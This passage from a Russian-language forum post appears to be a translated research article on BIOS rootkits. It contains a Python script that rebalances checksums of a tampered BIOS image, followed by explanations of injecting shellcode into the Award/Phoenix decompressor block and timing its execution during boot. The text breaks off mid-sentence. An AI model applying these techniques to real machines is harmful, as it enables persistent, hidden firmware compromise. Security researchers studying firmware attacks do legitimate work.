	start_of_decomp_blk=0x3a400
	start_of_compensation=0x3affc
	end_of_decomp_blk=0x3b000
	
	ochksum=0 # original checksum
	mchksum=0 # modified checksum
	
	for i in range(start_of_decomp_blk,start_of_compensation):
  ochksum+=ord(orig[i])
  mchksum+=ord(modif[i])
	print "Checksums: Original= %08X Modified= %08X" % (ochksum,mchksum)
	
	# calculate difference

	chkdiff = (mchksum & 0xff) - (ochksum & 0xff)

	print "Diff : %08X" % chkdiff
	
	# balance the checksum
	newbios=modif[:start_of_compensation]
	newbios+=chr( (0x1FF-chkdiff) & 0xff )
	newbios+=modif[start_of_compensation+1:]
	
	mchksum=0 # modified checksum
	ochksum=0 # modified checksum
	for i in range(start_of_decomp_blk,end_of_decomp_blk):
  ochksum+=ord(orig[i])
  mchksum+=ord(newbios[i])
	print "Checksum: Original = %08X Final= %08X" % (ochksum,mchksum)
	print "(Please check the last digit, must be the same in both checkums)"
	
	
	newbiosname=sys.argv[2]+".compensated"
	w=open(newbiosname,'wb')
	w.write(newbios)
	w.close()
	print "New bios saved as %s" % newbiosname
	
	-------------------------------------------------------------

С помощью этой техники мы успешно изменяем один бит, один байт и несколько байт на несжатой области BIOS. Первый шаг сделан.


---[3.2.2.1 - Внедрение кода

Вредоносный код находится все в том же месте: блок декомпрессора. Мы также переходим на то же место, что и в инъекции кода VMware: в конце блока декомпрессора в целом было достаточно места для того чтобы сделать довольно приличный первый шеллкод. Подсказка: при поиске "= Award Decompression Bios =" в BIOS Phoenix, имеем блок с пометкой "DECOMPCODE" (с использованием phnxdeco или любого другого инструмента). Техника почти никогда не меняется. Есть несколько пунктов, которые ты должен сделать, чтобы убедиться, что подключился правильно. Во-первых, включить основной вредоносный код, который перебрасывает вперед, а затем возвращает. Задем изменить его, чтобы привести к бесконечному циклу (у нас нет отладчика, поэтому мы должны использовать эту ужасную технику). Если ты можешь контролировать правильную загрузку компьютера и его блокировку, Graz! Теперь у тебя есть код, скрыто выполняющийся из BIOS.


---[3.2.3 - Подгрузка

Теперь у нас есть контроль над BIOS. Ты откапываешь в своей голове навык 16-битного шеллкодинга и пытаешься заюзать 10h INT для вывода "I Pwned J00!" на экран, а затем приступить к использованию INT 13h, чтобы писать на жесткий диск. Не беги вперед паровоза, иначе тебя поглотит черный экран эпик фэйла. Это потому, что у тебя все еще нет полного контроля над BIOS. Для начала впомни, как мы это делали с кодом на VMware: мы исполняли код несколько раз во время процесса загрузки. В первый момент времени диск не вращается, экран по-прежнему выключен и, что самое удивительное, прерывание векторной таблицы не инициализировано. Звучит круто, но на самом деле это большая проблема. Ты не можешь производить запись на диск, если он не вращается, но ты можешь использовать прерывание, если IVT не инициализирован. Тебе следует подождать. Но как мы узнаем, когда для подойдет время для выполнения? Нам опять потребуется некий ready-to-go signal (сигнал готовности).


---[3.2.3.1 - Сигнал готовности

В VMware, мы использовали содержание IVT как сигнал готовности. Шеллкод проверял, готов ли IVT, путем получения от него правильных значений. Это было очень легко, потому что в реальном режиме IVT всегда находится на ожном и том же месте (0000:0000 легко запомнить, кстати). Этот метод - полный отстой, потому что реально ты из этого больше ничего не извлечешь.

Указатели на IVT все время отличаются, даже между версиями одного и того же производителя BIOS. Нам необходима лучшая, превосходящая &q
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх